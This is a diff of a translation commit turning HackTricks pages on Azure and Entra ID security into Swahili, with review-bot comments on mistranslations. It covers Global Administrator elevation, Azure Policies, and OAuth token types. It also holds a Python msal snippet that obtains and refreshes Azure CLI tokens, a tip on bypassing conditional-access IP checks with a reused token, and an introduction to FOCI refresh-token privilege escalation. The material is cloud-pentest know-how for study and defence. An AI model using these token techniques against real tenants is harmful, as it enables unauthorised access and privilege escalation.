<figure><img src="../../../images/image (191).png" alt=""><figcaption><p><a href="https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10">https://link.springer.com/chapter/10.1007/978-1-4842-7325-8_10</a></p></figcaption></figure>

### Global Administrator

Global Administrator is a role from Entra ID that grants **complete control over the Entra ID tenant**. However, it doesn't grant any permissions over Azure resources by default.
Global Administrator ni jukumu kutoka Entra ID linalotoa **udhibiti kamili juu ya mpangilio wa Entra ID**. Hata hivyo, halitoi ruhusa yoyote juu ya rasilimali za Azure kwa msingi.

Users with the Global Administrator role has the ability to '**elevate' to User Access Administrator Azure role in the Root Management Group**. So Global Administrators can manage access in **all Azure subscriptions and management groups.**\
This elevation can be done at the end of the page: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)
Watumiaji wenye jukumu la Global Administrator wana uwezo wa '**kuinua' hadi Jukumu la Msimamizi wa Ufikiaji wa Mtumiaji wa Azure katika Kundi la Usimamizi wa Mizizi**. Hivyo, Wasimamizi wa Global wanaweza kusimamia ufikiaji katika **mikataba yote ya Azure na makundi ya usimamizi.**\
Kuinua hii inaweza kufanywa mwishoni mwa ukurasa: [https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/\~/Properties](https://portal.azure.com/#view/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/~/Properties)

<figure><img src="../../../images/image (349).png" alt=""><figcaption></figcaption></figure>

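Review bot: "all Azure subscriptions and management groups" is translated as "mikataba yote ya Azure na makundi ya usimamizi", but "mikataba" means contracts, and everywhere else in this file "subscription" is rendered as "usajili" (e.g. "jukumu kwenye usajili" in the inheritance paragraph, "usajili na vikundi vya rasilimali" in the Built-In roles section); use "usajili" here too so the elevation sentence can be matched against those sections. The same sentence translates the role name "User Access Administrator" to "Msimamizi wa Ufikiaji wa Mtumiaji" while keeping "Global Administrator" in English; the elevated role is a specific Azure RBAC role that the reader must find by name, so it is better left verbatim.
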
### Azure Policies

**Azure Policies** are rules that help organizations ensure their resources meet specific standards and compliance requirements. They allow you to **enforce or audit settings on resources in Azure**. For example, you can prevent the creation of virtual machines in an unauthorized region or ensure that all resources have specific tags for tracking.
**Azure Policies** ni sheria zinazosaidia mashirika kuhakikisha rasilimali zao zinakidhi viwango maalum na mahitaji ya ufuatiliaji. Zinakuwezesha **kulazimisha au kukagua mipangilio kwenye rasilimali za Azure**. Kwa mfano, unaweza kuzuia uundaji wa mashine za virtual katika eneo lisiloidhinishwa au kuhakikisha kwamba rasilimali zote zina lebo maalum za kufuatilia.

Azure Policies are **proactive**: they can stop non-compliant resources from being created or changed. They are also **reactive**, allowing you to find and fix existing non-compliant resources.
Azure Policies ni **za awali**: zinaweza kuzuia rasilimali zisizokidhi viwango zisizoundwa au kubadilishwa. Pia ni **za majibu**, zikikuruhusu kupata na kurekebisha rasilimali zisizokidhi viwango zilizopo.

#### **Key Concepts**

1. **Policy Definition**: A rule, written in JSON, that specifies what is allowed or required.
2. **Policy Assignment**: The application of a policy to a specific scope (e.g., subscription, resource group).
3. **Initiatives**: A collection of policies grouped together for broader enforcement.
4. **Effect**: Specifies what happens when the policy is triggered (e.g., "Deny," "Audit," or "Append").
1. **Policy Definition**: Sheria, iliyoandikwa kwa JSON, inayobainisha kile kinachoruhusiwa au kinachohitajika.
2. **Policy Assignment**: Matumizi ya sera kwa kiwango maalum (mfano, usajili, kundi la rasilimali).
3. **Initiatives**: Mkusanyiko wa sera zilizopangwa pamoja kwa ajili ya utekelezaji mpana.
4. **Effect**: Inabainisha kinachotokea wakati sera inapoanzishwa (mfano, "Deny," "Audit," au "Append").

**Some examples:**
**Mifano kadhaa:**

1. **Ensuring Compliance with Specific Azure Regions**: This policy ensures that all resources are deployed in specific Azure regions. For example, a company might want to ensure all its data is stored in Europe for GDPR compliance.
2. **Enforcing Naming Standards**: Policies can enforce naming conventions for Azure resources. This helps in organizing and easily identifying resources based on their names, which is helpful in large environments.
3. **Restricting Certain Resource Types**: This policy can restrict the creation of certain types of resources. For example, a policy could be set to prevent the creation of expensive resource types, like certain VM sizes, to control costs.
4. **Enforcing Tagging Policies**: Tags are key-value pairs associated with Azure resources used for resource management. Policies can enforce that certain tags must be present, or have specific values, for all resources. This is useful for cost tracking, ownership, or categorization of resources.
5. **Limiting Public Access to Resources**: Policies can enforce that certain resources, like storage accounts or databases, do not have public endpoints, ensuring that they are only accessible within the organization's network.
6. **Automatically Applying Security Settings**: Policies can be used to automatically apply security settings to resources, such as applying a specific network security group to all VMs or ensuring that all storage accounts use encryption.
1. **Kuhakikisha Ufuatiliaji na Mikoa Maalum ya Azure**: Sera hii inahakikisha kwamba rasilimali zote zinapelekwa katika mikoa maalum ya Azure. Kwa mfano, kampuni inaweza kutaka kuhakikisha kwamba data yake yote inahifadhiwa barani Ulaya kwa ajili ya ufuatiliaji wa GDPR.
|
||||
2. **Kulazimisha Viwango vya Ujumuishaji**: Sera zinaweza kulazimisha kanuni za majina kwa rasilimali za Azure. Hii inasaidia katika kuandaa na kutambua kwa urahisi rasilimali kulingana na majina yao, ambayo ni muhimu katika mazingira makubwa.
|
||||
3. **Kuzuia Aina Fulani za Rasilimali**: Sera hii inaweza kuzuia uundaji wa aina fulani za rasilimali. Kwa mfano, sera inaweza kuwekwa kuzuia uundaji wa aina za rasilimali zenye gharama kubwa, kama vile ukubwa fulani wa VM, ili kudhibiti gharama.
|
||||
4. **Kulazimisha Sera za Uwekaji Lebo**: Lebo ni jozi za funguo-thamani zinazohusishwa na rasilimali za Azure zinazotumika kwa usimamizi wa rasilimali. Sera zinaweza kulazimisha kwamba lebo fulani lazima ziwepo, au ziwe na thamani maalum, kwa rasilimali zote. Hii ni muhimu kwa ufuatiliaji wa gharama, umiliki, au upangaji wa rasilimali.
|
||||
5. **Kuzuia Ufikiaji wa Umma kwa Rasilimali**: Sera zinaweza kulazimisha kwamba rasilimali fulani, kama akaunti za hifadhi au hifadhidata, hazina maeneo ya umma, kuhakikisha kwamba zinapatikana tu ndani ya mtandao wa shirika.
|
||||
6. **Kuweka Mipangilio ya Usalama Kiotomatiki**: Sera zinaweza kutumika kuweka mipangilio ya usalama kiotomatiki kwa rasilimali, kama vile kuweka kundi maalum la usalama wa mtandao kwa VMs zote au kuhakikisha kwamba akaunti zote za hifadhi zinatumia usimbaji.
|
||||
|
||||
Note that Azure Policies can be attached to any level of the Azure hierarchy, but they are **commonly used in the root management group** or in other management groups.
|
||||
Kumbuka kwamba Azure Policies zinaweza kuunganishwa kwenye ngazi yoyote ya hiyerarhii ya Azure, lakini mara nyingi hutumiwa katika kundi la usimamizi wa mizizi **au katika makundi mengine ya usimamizi**.
|
||||
|
||||
Azure policy json example:
|
||||
|
||||
```json
|
||||
{
|
||||
"policyRule": {
|
||||
"if": {
|
||||
"field": "location",
|
||||
"notIn": ["eastus", "westus"]
|
||||
},
|
||||
"then": {
|
||||
"effect": "Deny"
|
||||
}
|
||||
},
|
||||
"parameters": {},
|
||||
"displayName": "Allow resources only in East US and West US",
|
||||
"description": "This policy ensures that resources can only be created in East US or West US.",
|
||||
"mode": "All"
|
||||
"policyRule": {
|
||||
"if": {
|
||||
"field": "location",
|
||||
"notIn": ["eastus", "westus"]
|
||||
},
|
||||
"then": {
|
||||
"effect": "Deny"
|
||||
}
|
||||
},
|
||||
"parameters": {},
|
||||
"displayName": "Allow resources only in East US and West US",
|
||||
"description": "This policy ensures that resources can only be created in East US or West US.",
|
||||
"mode": "All"
|
||||
}
|
||||
```
|
||||
|
||||
### Permissions Inheritance
|
||||
|
||||
In Azure **permissions are can be assigned to any part of the hierarchy**. That includes management groups, subscriptions, resource groups, and individual resources. Permissions are **inherited** by contained **resources** of the entity where they were assigned.
|
||||
Katika Azure **permissions zinaweza kupewa sehemu yoyote ya hiyerarhii**. Hii inajumuisha makundi ya usimamizi, usajili, vikundi vya rasilimali, na rasilimali binafsi. Permissions **zinapewa** na **rasilimali** zilizomo katika chombo ambacho zilipewa.
|
||||
|
||||
This hierarchical structure allows for efficient and scalable management of access permissions.
|
||||
Muundo huu wa hiyerarhii unaruhusu usimamizi mzuri na wa kupanuka wa ruhusa za ufikiaji.
|
||||
|
||||
<figure><img src="../../../images/image (26).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
### Azure RBAC vs ABAC
|
||||
|
||||
**RBAC** (role-based access control) is what we have seen already in the previous sections: **Assigning a role to a principal to grant him access** over a resource.\
|
||||
However, in some cases you might want to provide **more fined-grained access management** or **simplify** the management of **hundreds** of role **assignments**.
|
||||
**RBAC** (udhibiti wa ufikiaji kulingana na jukumu) ni kile tulichokiona tayari katika sehemu zilizopita: **Kutoa jukumu kwa msingi ili kumpa ufikiaji** juu ya rasilimali.\
|
||||
Hata hivyo, katika baadhi ya matukio unaweza kutaka kutoa **usimamizi wa ufikiaji wa kiwango cha juu zaidi** au **kurahisisha** usimamizi wa **mamia** ya **mipangilio** ya jukumu.
|
||||
|
||||
Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
|
||||
You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
|
||||
Azure **ABAC** (udhibiti wa ufikiaji kulingana na sifa) inajengwa juu ya Azure RBAC kwa kuongeza **masharti ya mipangilio ya jukumu kulingana na sifa** katika muktadha wa vitendo maalum. _Sharti la mipangilio ya jukumu_ ni **ukaguzi wa ziada ambao unaweza kuongeza kwa hiari kwenye mipangilio yako ya jukumu** ili kutoa udhibiti wa ufikiaji wa kiwango cha juu zaidi. Sharti linachuja ruhusa zinazotolewa kama sehemu ya ufafanuzi wa jukumu na mipangilio ya jukumu. Kwa mfano, unaweza **kuongeza sharti linalohitaji kitu kuwa na lebo maalum ili kusoma kitu**.\
|
||||
Huwezi **kukatisha** **ufikiaji** kwa rasilimali maalum **ukitumia masharti**.
|
||||
|
||||
## References
|
||||
|
||||
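Review bot: the added Swahili line "Permissions **zinapewa** na **rasilimali** zilizomo katika chombo ambacho zilipewa" inverts the direction of "Permissions are **inherited** by contained **resources**": "zinapewa na" reads as "are granted by", so the translation now says the contained resources grant the permissions. Suggest "Permissions **zinarithiwa** na **rasilimali** zilizomo katika chombo ambacho zilipewa". Also in this region: "ufuatiliaji" (monitoring, tracking) is used for "compliance" in "mahitaji ya ufuatiliaji" and in "Kuhakikisha Ufuatiliaji na Mikoa Maalum ya Azure"; "utiifu" or "uzingatiaji" is the usual term. "Kulazimisha Viwango vya Ujumuishaji" renders "Enforcing Naming Standards" as integration standards; suggest "Viwango vya Majina". "Huwezi **kukatisha** **ufikiaji** kwa rasilimali maalum **ukitumia masharti**" drops "explicitly" from "You **cannot** explicitly **deny** **access**", which is the point of that sentence, and "kukatisha" means cut off rather than deny; suggest "Huwezi **kukataa** **ufikiaji** waziwazi ...". Finally, the body of the ```json policy block appears twice with identical text (removed and added versions), so the only change inside that fence is indentation; a translation commit should leave code fences untouched.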
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
|
||||
- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
|
||||
|
||||
{{#include ../../../banners/hacktricks-training.md}}
@@ -4,98 +4,97 @@
|
||||
|
||||
## Basic Information
|
||||
|
||||
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
|
||||
Entra ID ni jukwaa la usimamizi wa utambulisho na ufikiaji (IAM) la Microsoft linalotegemea wingu, likihudumia kama mfumo wa msingi wa uthibitishaji naidhinisha huduma kama Microsoft 365 na Azure Resource Manager. Azure AD inatekeleza mfumo wa idhini wa OAuth 2.0 na itifaki ya uthibitishaji ya OpenID Connect (OIDC) ili kusimamia ufikiaji wa rasilimali.
|
||||
|
||||
### OAuth
|
||||
|
||||
**Key Participants in OAuth 2.0:**
|
||||
**Washiriki Wakuu katika OAuth 2.0:**
|
||||
|
||||
1. **Resource Server (RS):** Protects resources owned by the resource owner.
|
||||
2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
|
||||
3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
|
||||
4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
|
||||
1. **Seva ya Rasilimali (RS):** Inalinda rasilimali zinazomilikiwa na mmiliki wa rasilimali.
|
||||
2. **Mmiliki wa Rasilimali (RO):** Kawaida ni mtumiaji wa mwisho anaye miliki rasilimali zilizolindwa.
|
||||
3. **Programu ya Mteja (CA):** Programu inayotafuta ufikiaji wa rasilimali kwa niaba ya mmiliki wa rasilimali.
|
||||
4. **Seva ya Uidhinishaji (AS):** Inatoa alama za ufikiaji kwa programu za mteja baada ya kuthibitisha na kuidhinisha.
|
||||
|
||||
**Scopes and Consent:**
|
||||
**Mikondo na Idhini:**
|
||||
|
||||
- **Scopes:** Granular permissions defined on the resource server that specify access levels.
|
||||
- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
|
||||
- **Mikondo:** Ruhusa za kina zilizofafanuliwa kwenye seva ya rasilimali zinazobainisha viwango vya ufikiaji.
|
||||
- **Idhini:** Mchakato ambao mmiliki wa rasilimali anatoa ruhusa kwa programu ya mteja kufikia rasilimali zenye mikondo maalum.
|
||||
|
||||
**Microsoft 365 Integration:**
|
||||
**Ushirikiano wa Microsoft 365:**
|
||||
|
||||
- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
|
||||
- These applications are deeply integrated and often have interdependent service relationships.
|
||||
- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
|
||||
- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
|
||||
- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
|
||||
- Microsoft 365 inatumia Azure AD kwa IAM na inajumuisha programu nyingi za "first-party" za OAuth.
|
||||
- Programu hizi zimeunganishwa kwa kina na mara nyingi zina uhusiano wa huduma zinazohusiana.
|
||||
- Ili kurahisisha uzoefu wa mtumiaji na kudumisha kazi, Microsoft inatoa "idhini iliyodhaniwa" au "idhini ya awali" kwa programu hizi za first-party.
|
||||
- **Idhini Iliyodhaniwa:** Programu fulani zinapewa moja kwa moja **ufikiaji wa mikondo maalum bila idhini wazi ya mtumiaji au msimamizi**.
|
||||
- Mikondo hii ya awali kwa kawaida inafichwa kutoka kwa watumiaji na wasimamizi, na kuifanya iwe na mwonekano mdogo katika interfaces za usimamizi wa kawaida.
|
||||
|
||||
**Client Application Types:**
|
||||
**Aina za Programu za Mteja:**
|
||||
|
||||
1. **Confidential Clients:**
|
||||
- Possess their own credentials (e.g., passwords or certificates).
|
||||
- Can **securely authenticate themselves** to the authorization server.
|
||||
2. **Public Clients:**
|
||||
- Do not have unique credentials.
|
||||
- Cannot securely authenticate to the authorization server.
|
||||
- **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
|
||||
1. **Wateja wa Siri:**
|
||||
- Wana akidi zao wenyewe (mfano, nywila au vyeti).
|
||||
- Wanaweza **kujithibitisha kwa usalama** kwa seva ya uidhinishaji.
|
||||
2. **Wateja wa Umma:**
|
||||
- Hawana akidi za kipekee.
|
||||
- Hawawezi kujithibitisha kwa usalama kwa seva ya uidhinishaji.
|
||||
- **Athari za Usalama:** Mshambuliaji anaweza kujifanya kuwa programu ya mteja wa umma anapohitaji alama, kwani hakuna mekanismu kwa seva ya uidhinishaji kuthibitisha uhalali wa programu.
|
||||
|
||||
## Authentication Tokens
|
||||
|
||||
There are **three types of tokens** used in OIDC:
|
||||
Kuna **aina tatu za alama** zinazotumika katika OIDC:
|
||||
|
||||
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
|
||||
- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
|
||||
- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
|
||||
- A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
|
||||
- A refresh token is encrypted and only Microsoft can decrypt it.
|
||||
- Getting a new refresh token doesn't revoke the previous refresh token.
|
||||
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Mteja anawasilisha alama hii kwa seva ya rasilimali ili **kufikia rasilimali**. Inaweza kutumika tu kwa mchanganyiko maalum wa mtumiaji, mteja, na rasilimali na **haiwezi kufutwa** hadi ipite muda - yaani, saa 1 kwa kawaida.
|
||||
- **ID Tokens**: Mteja anapata alama hii **kutoka kwa seva ya uidhinishaji**. Inajumuisha taarifa za msingi kuhusu mtumiaji. Inafungwa kwa mchanganyiko maalum wa mtumiaji na mteja.
|
||||
- **Refresh Tokens**: Zinapeanwa kwa mteja pamoja na alama ya ufikiaji. Zinatumika **kupata alama mpya za ufikiaji na ID**. Inafungwa kwa mchanganyiko maalum wa mtumiaji na mteja na inaweza kufutwa. Muda wa kawaida wa kuisha ni **siku 90** kwa alama za refresha zisizofanya kazi na **hakuna muda wa kuisha kwa alama za kazi** (kutoka kwa alama ya refresha inawezekana kupata alama mpya za refresha).
|
||||
- Alama ya refresha inapaswa kuunganishwa na **`aud`**, kwa baadhi ya **mikondo**, na kwa **tenant** na inapaswa kuwa na uwezo wa kuzalisha alama za ufikiaji kwa ajili ya aud hiyo, mikondo (na hakuna zaidi) na tenant. Hata hivyo, hii si hali kwa **alama za programu za FOCI**.
|
||||
- Alama ya refresha imefichwa na ni Microsoft pekee inayoweza kuifungua.
|
||||
- Kupata alama mpya ya refresha hakufuti alama ya refresha ya awali.
|
||||
|
||||
> [!WARNING]
|
||||
> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
|
||||
> Taarifa za **ufikiaji wa masharti** zime **hifadhiwa** ndani ya **JWT**. Hivyo, ikiwa unahitaji **alama kutoka kwa anwani ya IP iliyoidhinishwa**, hiyo **IP** itakuwa **hifadhiwa** katika alama na kisha unaweza kutumia alama hiyo kutoka kwa **IP isiyoidhinishwa kufikia rasilimali**.
|
||||
|
||||
### Access Tokens "aud"
|
||||
|
||||
The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
|
||||
Uwanja ulioonyeshwa katika uwanja wa "aud" ni **seva ya rasilimali** (programu) inayotumika kufanya kuingia.
|
||||
|
||||
The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
|
||||
Amri `az account get-access-token --resource-type [...]` inasaidia aina zifuatazo na kila moja itongeza "aud" maalum katika alama ya ufikiaji inayotokana:
|
||||
|
||||
> [!CAUTION]
|
||||
> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
|
||||
> Kumbuka kwamba yafuatayo ni APIs zinazosaidiwa na `az account get-access-token` lakini kuna zaidi.
|
||||
|
||||
<details>
|
||||
|
||||
<summary>aud examples</summary>
|
||||
<summary>mfano wa aud</summary>
|
||||
|
||||
- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
|
||||
- `https://graph.windows.net/`
|
||||
- **aad-graph (Azure Active Directory Graph API)**: Inatumika kufikia API ya zamani ya Azure AD Graph (iliyotengwa), ambayo inaruhusu programu kusoma na kuandika data ya directory katika Azure Active Directory (Azure AD).
|
||||
- `https://graph.windows.net/`
|
||||
|
||||
* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
|
||||
- `https://management.core.windows.net/ or https://management.azure.com/`
|
||||
* **arm (Azure Resource Manager)**: Inatumika kusimamia rasilimali za Azure kupitia API ya Azure Resource Manager. Hii inajumuisha operesheni kama kuunda, kuboresha, na kufuta rasilimali kama vile mashine za virtual, akaunti za hifadhi, na zaidi.
|
||||
- `https://management.core.windows.net/ or https://management.azure.com/`
|
||||
|
||||
- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
|
||||
- `https://batch.core.windows.net/`
|
||||
- **batch (Azure Batch Services)**: Inatumika kufikia Azure Batch, huduma inayowezesha programu za kompyuta za kiwango kikubwa na za utendaji wa juu kwa ufanisi katika wingu.
|
||||
- `https://batch.core.windows.net/`
|
||||
|
||||
* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
|
||||
- `https://datalake.azure.net/`
|
||||
* **data-lake (Azure Data Lake Storage)**: Inatumika kuingiliana na Azure Data Lake Storage Gen1, ambayo ni huduma ya hifadhi ya data na uchambuzi inayoweza kupanuka.
|
||||
- `https://datalake.azure.net/`
|
||||
|
||||
- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
|
||||
- `https://rest.media.azure.net`
|
||||
- **media (Azure Media Services)**: Inatumika kufikia Azure Media Services, ambayo inatoa huduma za usindikaji na usambazaji wa media zinazotegemea wingu kwa maudhui ya video na sauti.
|
||||
- `https://rest.media.azure.net`
|
||||
|
||||
* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
|
||||
- `https://graph.microsoft.com`
|
||||
* **ms-graph (Microsoft Graph API)**: Inatumika kufikia Microsoft Graph API, kiunganishi kilichounganishwa kwa data za huduma za Microsoft 365. Inaruhusu kufikia data na maarifa kutoka kwa huduma kama Azure AD, Office 365, Enterprise Mobility, na huduma za Usalama.
|
||||
- `https://graph.microsoft.com`
|
||||
|
||||
- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
|
||||
- `https://ossrdbms-aad.database.windows.net`
|
||||
- **oss-rdbms (Azure Open Source Relational Databases)**: Inatumika kufikia huduma za Azure Database kwa injini za hifadhidata za uhusiano za chanzo wazi kama MySQL, PostgreSQL, na MariaDB.
|
||||
- `https://ossrdbms-aad.database.windows.net`
|
||||
|
||||
</details>
|
||||
|
||||
### Access Tokens Scopes "scp"
|
||||
|
||||
The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
|
||||
Mikondo ya alama ya ufikiaji inahifadhiwa ndani ya ufunguo wa scp ndani ya alama ya ufikiaji JWT. Mikondo hii inafafanua kile alama ya ufikiaji ina ufikiaji.
|
||||
|
||||
If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
|
||||
Ikiwa JWT inaruhusiwa kuwasiliana na API maalum lakini **haina mikondo** ya kufanya kitendo kilichohitajika, haitakuwa na uwezo wa kufanya kitendo hicho na JWT hiyo.
|
||||
|
||||
### Get refresh & access token example
|
||||
|
||||
```python
|
||||
# Code example from https://github.com/secureworks/family-of-client-ids-research
|
||||
import msal
|
||||
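Review bot: "inapaswa kuwa na uwezo wa kuzalisha alama za ufikiaji kwa ajili ya aud hiyo, mikondo (na hakuna zaidi) na tenant" drops the "only" from "it should only be able to generate access tokens for that aud, scopes (and no more) and tenant", which is exactly the boundary the FOCI section of this file later says is broken; suggest adding "tu": "... kwa ajili ya aud hiyo tu, mikondo (na hakuna zaidi) na tenant". Same hunk: "Alama ya refresha imefichwa" renders "encrypted" as "hidden"; suggest "imesimbwa". Typos: "uthibitishaji naidhinisha huduma" should be "uthibitishaji na uidhinishaji kwa huduma", and "itongeza" should be "itaongeza". Terminology: this hunk translates "token" as "alama" and "scope" as "mikondo" (streams), while the FOCI section in the same file keeps "refresh token", "access tokens" and "scopes" untranslated; pick one convention, preferably keeping the OAuth terms as-is since `scp`, `aud` and the `az account get-access-token` command are quoted verbatim. Bold was dropped from "Inafungwa kwa mchanganyiko maalum wa mtumiaji na mteja" (ID tokens) and from "haitakuwa na uwezo wa kufanya kitendo hicho" (scp section), where the English bolds the restriction.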
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
|
||||
|
||||
# LOGIN VIA CODE FLOW AUTHENTICATION
|
||||
azure_cli_client = msal.PublicClientApplication(
|
||||
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
|
||||
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
|
||||
)
|
||||
device_flow = azure_cli_client.initiate_device_flow(
|
||||
scopes=["https://graph.microsoft.com/.default"]
|
||||
scopes=["https://graph.microsoft.com/.default"]
|
||||
)
|
||||
print(device_flow["message"])
|
||||
|
||||
# Perform device code flow authentication
|
||||
|
||||
azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
|
||||
device_flow
|
||||
device_flow
|
||||
)
|
||||
pprint(azure_cli_bearer_tokens_for_graph_api)
|
||||
|
||||
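Review bot: every removed/added pair in this hunk is textually identical (`"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client`, `scopes=["https://graph.microsoft.com/.default"]`, `device_flow`), so the only change is leading whitespace inside the `msal.PublicClientApplication(...)`, `initiate_device_flow(...)` and `acquire_token_by_device_flow(...)` call arguments. That is still valid Python, but a translation commit has no reason to touch a ```python fence; suggest reverting the whitespace edits so the code stays identical to the upstream secureworks example it is credited to.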
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
|
||||
|
||||
# DECODE JWT
|
||||
def decode_jwt(base64_blob: str) -> Dict[str, Any]:
|
||||
"""Decodes base64 encoded JWT blob"""
|
||||
return jwt.decode(
|
||||
base64_blob, options={"verify_signature": False, "verify_aud": False}
|
||||
)
|
||||
"""Decodes base64 encoded JWT blob"""
|
||||
return jwt.decode(
|
||||
base64_blob, options={"verify_signature": False, "verify_aud": False}
|
||||
)
|
||||
decoded_access_token = decode_jwt(
|
||||
azure_cli_bearer_tokens_for_graph_api.get("access_token")
|
||||
azure_cli_bearer_tokens_for_graph_api.get("access_token")
|
||||
)
|
||||
pprint(decoded_access_token)
|
||||
|
||||
|
||||
# GET NEW ACCESS TOKEN AND REFRESH TOKEN
|
||||
new_azure_cli_bearer_tokens_for_graph_api = (
|
||||
# Same client as original authorization
|
||||
azure_cli_client.acquire_token_by_refresh_token(
|
||||
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
|
||||
# Same scopes as original authorization
|
||||
scopes=["https://graph.microsoft.com/.default"],
|
||||
)
|
||||
# Same client as original authorization
|
||||
azure_cli_client.acquire_token_by_refresh_token(
|
||||
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
|
||||
# Same scopes as original authorization
|
||||
scopes=["https://graph.microsoft.com/.default"],
|
||||
)
|
||||
)
|
||||
pprint(new_azure_cli_bearer_tokens_for_graph_api)
|
||||
```
|
||||
|
||||
## FOCI Tokens Privilege Escalation
|
||||
|
||||
Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
|
||||
Kabla ilisemwa kwamba refresh tokens zinapaswa kuunganishwa na **scopes** ambazo zilitengenezwa nazo, kwa **application** na **tenant** ambazo zilitengenezwa kwao. Ikiwa mojawapo ya mipaka hii itavunjwa, inawezekana kupandisha mamlaka kwani itakuwa inawezekana kutengeneza access tokens kwa rasilimali nyingine na tenants ambazo mtumiaji anaweza kufikia na kwa scopes zaidi kuliko ilivyokusudiwa awali.
|
||||
|
||||
Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
|
||||
Zaidi ya hayo, **hii inawezekana na refresh tokens zote** katika [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, na akaunti za kijamii kama Facebook na Google) kwa sababu kama [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) zinavyosema: "Refresh tokens zimefungwa kwa mchanganyiko wa mtumiaji na mteja, lakini **hazifungwi kwa rasilimali au tenant**. Mteja anaweza kutumia refresh token kupata access tokens **katika mchanganyiko wowote wa rasilimali na tenant** ambapo ana ruhusa kufanya hivyo. Refresh tokens zimefungwa na ni Microsoft identity platform pekee inayoweza kuzisoma."
|
||||
|
||||
